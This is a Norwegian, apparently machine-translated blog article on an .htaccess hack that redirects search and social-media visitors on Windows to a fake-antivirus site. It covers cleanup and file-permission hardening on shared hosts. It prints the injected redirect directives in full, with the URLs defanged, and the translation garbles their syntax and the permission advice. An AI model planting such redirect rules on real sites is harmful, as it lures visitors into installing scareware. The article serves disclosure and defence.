En ny form for virus som ser at ikke så veldig mye påvirker områder vert på upålitelige servere der brukerkontoer / underdomenekontoer kan "sees" mellom dem. Nærmere bestemt blir vertskontoene lagt i mappen "vhosts“, Og skriveretten til brukerens mappe av "vhosts" er gitt til en generell bruker ... av forhandleren i de fleste situasjoner. Det er en typisk metode for webservere som ikke bruker WHM / cPanel.
Innhold
.Htaccess virushandling - .htaccess hack
Virus påvirker filer .htaccess offeret nettstedet. Linjer er lagt til / Direktiver til omdirigere besøkende (kommer fra yahoo, msn, google, facebook, yaindex, twitter, myspace osv. trafikkerte nettsteder og portaler) til noen nettsteder som tilbyr "antivirus“. Det handler om falsk antivirus, Om som jeg skrev i innledningen til Fake Antivirus Remover.
Her er hva det ser ut som en .htaccess berørt: (ikke tilgang til innhold nettadresser linjer under)
ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3Skriv om på nytt
RewriteCond% {HTTP_REFERER}. * Yandex. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Odnoklassniki. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Vkontakte. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Rambler. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Tube. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Wikipedia. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Blogger. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Baidu. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Qq.com. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Myspace. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Twitter. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Facebook. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Google. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Live. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Aol. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Bing. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Msn. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Amazon. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Ebay. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LinkedIn. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Flickr. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LiveJasmin. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Soso. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * DoubleClick. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Pornhub. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Orkut. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LiveJournal. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. *wordpress. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Yahoo. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Ask. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Excite. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Altavista. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Msn. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Netscape. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Hotbot. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Goto. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Infoseek. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Mamma. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Alltheweb. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Lycos. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Søk. * $ [NC, OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond% {HTTP_REFERER}. * Mail. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Dogpile. * $ [NC]RewriteCond% {HTTP_USER_AGENT}. *Windows.*
RewriteRule. * Hxxp: //wwww.peoriavascularsurgery.com/main.php? H =% {HTTP_HOST} & i = J8iiidsar / qmiRj7V8NOyJoXpA == & e = r [R, L]RewriteCond% {REQUEST_FILENAME}!-F
RewriteCond% {REQUEST_FILENAME}!-D
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png$
RewriteCond% {HTTP_USER_AGENT}. *Windows.*
RewriteRule. * Hxxp: //wwww.peoriavascularsurgery.com/main.php? H =% {HTTP_HOST} & i = J8iiidsar / qmiRj7V8NOyJoXpA == & e = 4 [R, L]
De som bruker WordPress de vil finne disse linjene i filen .htaccess fra public_html. I tillegg oppretter viruset en identisk .htaccess i mappen wp-innhold.
*Det er også situasjoner der det vises i stedet for peoriavascularsurgery.com dns.thesoulfoodcafe.com eller andre adresser.
Hva gjør dette viruset?
Når den er omdirigert, blir den besøkende møtt med åpne armer av meldingen:
Advarsel!
Datamaskinen din inneholder forskjellige tegn på tilstedeværelse av virus og skadelig programvare. din system krever umiddelbar antiviruskontroll!
System Sikkerhet vil utføre en rask og gratis skanning av PCen din etter virus og ondsinnede programmer.
Uansett hvilken knapp vi trykker på, blir vi ført til siden "min datamaskin", Laget for å imitere XP-design. Det er her "skanneprosessen" starter automatisk, på slutten av det oppdager vi at "vi er smittet".
Etter å ha trykket OK eller Avbryt, vil den starte nedlastingav en fil setup.exe. Dette setup.exe er det falske antivirusprogrammet som påvirker systemet. Det vil installere en serie skadelige applikasjoner for å spre de infiserte koblingene ytterligere, og i tillegg en anti-virus programvare (også falsk) som offeret er invitert til å kjøpe.
De som allerede har fått denne formen for viruset, kan bruke den Fake Antivirus Remover. Det anbefales også å skanne hele harddisken. anbefale Kaspersky Internet Security eller Kaspersky Anti-Virus.
Denne virusformen påvirker operativsystemene til besøkende med operativsystemer Windows XP, Windows ME Windows 2000, Windows NT Windows 98 si Windows 95. Til dags dato er ingen tilfeller av infeksjon i operativsystemer kjent Windows Se ja Windows 7.
Hvordan kan vi fjerne dette .htaccess-viruset fra serveren og hvordan kan vi forhindre infeksjon.
1. Filanalyse og sletting av mistenkelige koder. For å sikre at ikke bare filen blir berørt .htaccess det er godt å vi analyserer alle filene . Php si . Js.
2. Skriv om .htaccess-filen og sett den opp chmod 644 eller 744 med skrive rettigheter bare på brukereier.
3. Når du oppretter en vertskonto for et nettsted, i mappen / Hjem eller / webroot oppretter automatisk en mappe som ofte har brukernavnet (bruker for cpanel, ftp, etc). For å forhindre skriving av data og overføring av virus fra en bruker til en annen, anbefales det å angi i hver brukermappe:
chmod 644 eller 744, 755 – 644 er angitt.
chown -R brukernavn mappenavn.
chgrp -R brukernavn mappenavn
Det er alt for å sjekke om modusene er satt riktig. Noe som:
drwx - x - x 12 dinamics dinamics 4096 6. mai 14:51 dinamics /
drwx - x - x 10 duran duran 4096 7. mars 07:46 duran /
drwx - x - x 12 reagensrør prøverør 4096 29. jan 11:23 prøverør /
drwxr-xr-x 14 express express 4096 26. februar 2009 express /
drwxr-xr-x 9 ezo ezo 4096 19. mai 01:09 ezo /
drwx - x - x 9 farma farma 4096 19. des 22:29 farma /
Hvis en av de ovennevnte brukerne vil ha på FTP Infiserte filer, vil den ikke kunne sende viruset til en annen vert bruker. Det er et minimum sikkerhetstiltak for å beskytte kontoer som er vert på en webserver.
Vanlige elementer i domenene som er berørt av denne typen virus.
Alle berørte domener omdirigerer besøkende til nettsteder som inneholder "/main.php? s = 4 & H".
Dette ".htaccess-virus”Påvirker alle typer CMS (joomla, WordPress, phpBB, osv.) som bruker .htaccess.
.htaccess Virus Hack & Redirect.
